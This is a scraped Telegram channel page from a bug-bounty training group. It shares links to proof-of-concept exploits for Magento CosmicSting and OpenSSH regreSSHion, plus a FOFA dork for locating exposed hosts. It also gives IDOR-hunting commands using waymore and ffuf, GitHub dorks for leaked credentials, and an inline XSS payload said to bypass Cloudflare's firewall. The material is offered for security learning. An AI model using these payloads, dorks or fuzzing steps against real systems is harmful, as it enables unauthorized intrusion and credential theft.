Brut Security
15.2K subscribers
965 photos
76 videos
292 files
1.01K links
βœ…DM: @wtf_brut
πŸ›ƒWhatsApp: https://wa.link/brutsecurity
🈴Training: https://brutsecurity.com
πŸ“¨Mail: info@brutsec.com
Download Telegram
This media is not supported in your browser
VIEW IN TELEGRAM
Whoever is commenting it doesn't work on latest updates of firefox, the video is for them only. No offence to anyone but you guys lack a lot of research's!
πŸ‘3❀1πŸ”₯1
cookieprompt.pdf
1.8 KB
πŸ‘2
πŸ”₯Unauthenticated Magento XXE to Privilege EscalationπŸ”₯

⚠️CosmicSting enables attackers to gain unauthorized access to sensitive files, including those containing passwords.
When combined with a recent Linux bug (CVE-2024-2961),the vulnerability can be escalated to remote code execution.

▢️Video POC: https://youtu.be/j9KiNmGbT9Q

πŸ”΄POC: https://github.com/th3gokul/CVE-2024-34102
πŸ’₯Payload: https://gist.github.com/wtf-yodhha/b4b12a09a4c2d3af0e04b74968daed5d
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ‘2😱2
Hope you guys learning from the resources which I am sharing, if you have any suggestions or questions you can do comment.

Thanks and Regards,
The Brut Security Team
β˜„οΈ
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯6πŸ‘4
When hunting for IDORs during a bug bounty program, consider the following tip:

1. Leverage archive tools: Utilize tools like Wayback Machine or specialized software like Waymore to manually archive and analyze subdomains. This can help uncover hidden or previously accessible endpoints that may now be vulnerable to IDORs.

Example usage:
python3 waymore.py -i sub.target.com -mode U -xcc

2. Extract all paths with specific keywords: After identifying potential paths, extract all URLs containing specific keywords, such as "admin" or "manager," to narrow down your search.

Example command:
cat result.txt | grep "admin"

3. Fuzzing: If you find a suspicious path but it doesn't yield any results, try fuzzing the URL with a wordlist. This can help uncover hidden or unintended parameters.

Example usage:
ffuf -u https://sub.taget.com/promo/offer/1234/FUZZ -mc 200

4. Brute force: If you find a path with a dynamic ID, consider brute-forcing the last digits or numbers. This can help uncover additional sensitive information or functionality.

Example scenario:
Found path: https://sub.taget.com/promo/offer/1234/details

Brute-force the last 3 digits: 1234


By following these steps, you can uncover hidden or unintended IDORs, leading to potential security vulnerabilities and rewards in bug bounty programs.
πŸ”₯8πŸ‘1
A payload that bypasses Cloudflare WAF

<img/src=x onError="`${x}`;alert(`Hello`);">
πŸ‘11
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯1
This media is not supported in your browser
VIEW IN TELEGRAM
πŸ“’CSPRecon: Discover new target domains using Content Security Policy.

⚠️This project was created for educational purposes and should not be used in environments without legal authorization.

πŸ”— Download: https://github.com/edoardottt/csprecon
πŸ‘7
πŸ’ƒπŸ’ƒπŸ’ƒπŸ’ƒπŸ’ƒπŸ’ƒπŸ’ƒπŸ’ƒπŸ’ƒπŸ’ƒπŸ’ƒπŸ’ƒπŸ’ƒ
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯3🀑2
⚠️ CVE-2024-6387: Critical OpenSSH Unauthenticated RCE Flaw β€˜regreSSHion’ Exposes Millions of Linux Systems

🎯96.4 million+ Results are found on the en.fofa.info nearly year.

πŸ’₯FOFA Dork: app="OpenSSH"

πŸ”–Refer: https://lnkd.in/gkENKHPv

ℹ️POC: https://lnkd.in/gzEWNHAX

#OSINT #FOFA #openssh #bugbounty #bugbountytips #cybersecurity #infosec
πŸ”₯2
A very good morning to you guys πŸ”«πŸ”«πŸ”«πŸ”«
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯4❀‍πŸ”₯1πŸ‘1
πŸ”List of GitHub Dorks for bug bounties.

πŸ“‹Finding
target Files, Languages, API Keys,
Tokens, Usernames, Passwords, Information using
Dates, Extension πŸ““

πŸ”–#infosec #cybersecurity #hacking #pentesting #security
πŸ”₯7πŸ‘1
Who is a good speaker? πŸ”Š @Mebledy do you want to live podcast with everyone?
This media is not supported in your browser
VIEW IN TELEGRAM
πŸ₯΄
πŸ‘6🫑4πŸ”₯1
🌐 Advanced Web Application Penetration Testing Course - Elevate Your Cybersecurity Skills! 🌐

πŸ”— Full Course Curriculum: https://brutsec.com/WebPentesting.pdf

πŸ—“οΈ Course Details:
Starting: July 16th, 4PM IST
Duration: 2 Months
Schedule: 3 Days a Week

Format: Online Classes
Languages: Hindi, English, Bengali

🌟 Why Enroll?
Gain practical, hands-on experience with a curriculum that covers a wide range of advanced web security topics. Here’s what you’ll learn:
- πŸ” Reconnaissance Techniques
- 🌐 Subdomain Enumeration
- πŸ’» Port Scanning
- πŸ› οΈ HTML Injection
- πŸ›‘οΈ XSS (Cross-Site Scripting)
- πŸ”’ SQL Injection
- πŸ“‚ File Uploading
- 🧩 CORS Exploitation
- πŸ•΅οΈβ€β™‚οΈ Command Injection

πŸ“ž Enroll Now:
Feel free to DM your queries on our WhatsApp: https://wa.me/918945971332

#bugbounty #bugbountytips #cybersecurity
πŸ‘2πŸ”₯1
Getting good feedbacks helps you to improve more 🀭
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯2